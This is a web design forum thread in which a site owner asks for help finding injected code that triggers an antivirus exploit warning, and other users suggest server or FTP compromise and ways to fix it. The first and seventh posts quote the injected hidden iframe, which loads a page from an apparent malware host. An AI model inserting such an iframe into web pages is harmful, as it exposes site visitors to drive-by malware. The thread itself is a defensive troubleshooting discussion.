Welcome to TalkGraphics.com
Page 1 of 2 12 LastLast
Results 1 to 10 of 17
  1. #1
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Default Locating hidden exploit code within a home page design

    I appear to have an rogue piece of code that has somehow inserted itself into my current website design and I am unable to find where it would be hiding. Whenever I view the page in a browser my security software comes up with this warning

    Exploit:HTML/IframeRef.DM

    The AV software cleans it from the cache but as soon as I reload the page of course it is back again

    I have tried to back track as to where it would have first appeared and all I can think of is when I tried to include a FormSite form into a placeholder on my home page - but this is a wild guess. I have deleted the placeholder for this and as far as I know the associated <iframe> placeholder also.

    The images I am using on the site are a combination of in house photos and some that I have purchased from 123RF which I would expect would be free of malicious code.

    I also played with the Facebook wideget to but have since deleted it as well.

    So far I have trawled the page for possible locations but no luck.

    Looking at the source code of the page I find at the very bottom of all the code..

    <!--[if lt IE 7]><script type="text/javascript" src="index_htm_files/png.js"></script><![endif]-->
    <script type="text/javascript">xr_aeh()</script>
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe></body>
    </html>

    Where is this hiding?

    Anyone have any experience with how I would go about finding what this code has attached itself to?

    Cheers

  2. #2
    Join Date
    Sep 2005
    Location
    London, England
    Posts
    520

    Default Re: Locating hidden exploit code within a home page design

    It would appear to be something to do with the Twitter iframe. The URL in that triggers my anti virus.

  3. #3
    Join Date
    May 2013
    Location
    Jacksonville Florida
    Posts
    95

    Default Re: Locating hidden exploit code within a home page design

    does it happen on your computer When you visit any other web pages? Is the AV that comes up Your anti virus or a FAKE AV , There are some of those around associated with Twitter and Facebook.
    Thanks Jim

    I love to Bully Pixels

  4. #4
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Default Re: Locating hidden exploit code within a home page design

    I only played with inserting a Facebook widget into the home page as well as embeding a feedback form that I have stored on FormSite. I was able to get the Facebook widget to work, however with the embeded form I first received the AV notice when I tried to use it live on my site.

    My AV is Microsoft Security Essentials and Malware Bytes.

    I don't know where that iframe is hiding though - I have even painstakingly deleted all the body content on the home page and the dragged the mouse over the resulting blank page. It took a few passes but I found 2 small hidden frames which I deleted and then put the page back together again.

    I uploaded the home page again and it all seemed to work fine till this morning when it would not only bring up the AV warning but also no graphics on the page would load.

    I don't get any warning when I browse the internet - only if I attempt to reload my own webpage.

    The source code mentions png.js - I assume that is the culprit and the Twitter iframe is is inside that. Is there a way in Xara to display all iframes or scripts that are a part of a page?

    Thanks for the help.

  5. #5

    Default Re: Locating hidden exploit code within a home page design

    It is more likely that the code injection is occurring on the server after you have published.
    To test this, publish a new totally empty page.

    The xara png.js is for older versions of IE to show alpha channel png images, nothing to do with twitter or iframes.

  6. #6
    Join Date
    May 2013
    Location
    Australia
    Posts
    8

    Default Re: Locating hidden exploit code within a home page design

    I have deleted the index_htm file folder, then uploaded a blank page - no AV notice. I then uploaded a single Xara template page that didn't upset the AV software either. Now I have uploaded the original .web file and will wait to see what happens.

    I had tried deleting all the files and folders on the web server previously and the exploit didn't appear immediately - worked ok that night but next morning site was broken.

    Cheers

  7. #7
    Join Date
    Apr 2010
    Location
    Kildare, Ireland
    Posts
    906

    Default Re: Locating hidden exploit code within a home page design

    Did you remove this as suggested?
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?i=1353323></iframe>
    As it's at the bottom of your page code the first place I would check is in Web Properties -> Website tab -> Html Code (body). And also check any placeholders.

    If you can't find the code when editing in xara try exporting the website locally and when you view the exported source is the offending code there? And does it match exactly with the source of the online page? If not you might have some malicious script on your website that's modifying the uploaded files and you shoud change your ftp password and search for any dodgy files and remove them and then upload your site again.
    XT-CMS - a self-hosted CMS for Xara Designers - Xara + CMS Demo with blog & ecommerce shopping cart system.

  8. #8
    Join Date
    Sep 2005
    Location
    London, England
    Posts
    520

    Default Re: Locating hidden exploit code within a home page design

    Quote Originally Posted by jim64 View Post
    does it happen on your computer When you visit any other web pages? Is the AV that comes up Your anti virus or a FAKE AV , There are some of those around associated with Twitter and Facebook.

    Yes it does happen occasionally. The AV warning is from my Bitdefender anti phishing toolbar.

    It certainly looks like you have something resident on your server that is generating the malicious code. If you Google around, kozijnen.com does seem to be associated with malware.

  9. #9
    Join Date
    Jul 2008
    Location
    Phoenix, AZ
    Posts
    267

    Default Re: Locating hidden exploit code within a home page design

    It's also possible that your ftp login has been compromised. You may want to change it or if you have access, review your ftp log to see who's been logging in, it should note the IPs of people uploading/downloading files. If you see a strange IP there, change your password.
    Chris
    LotsMoreHosting.com

  10. #10
    Join Date
    Jan 2013
    Posts
    17

    Default Re: Locating hidden exploit code within a home page design

    Are you by any chance using filezilla to upload your sites?
    I was once told that it stores passwords without encryption and that hackers can get the passwords very easy when using torrents and such...

 

 

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •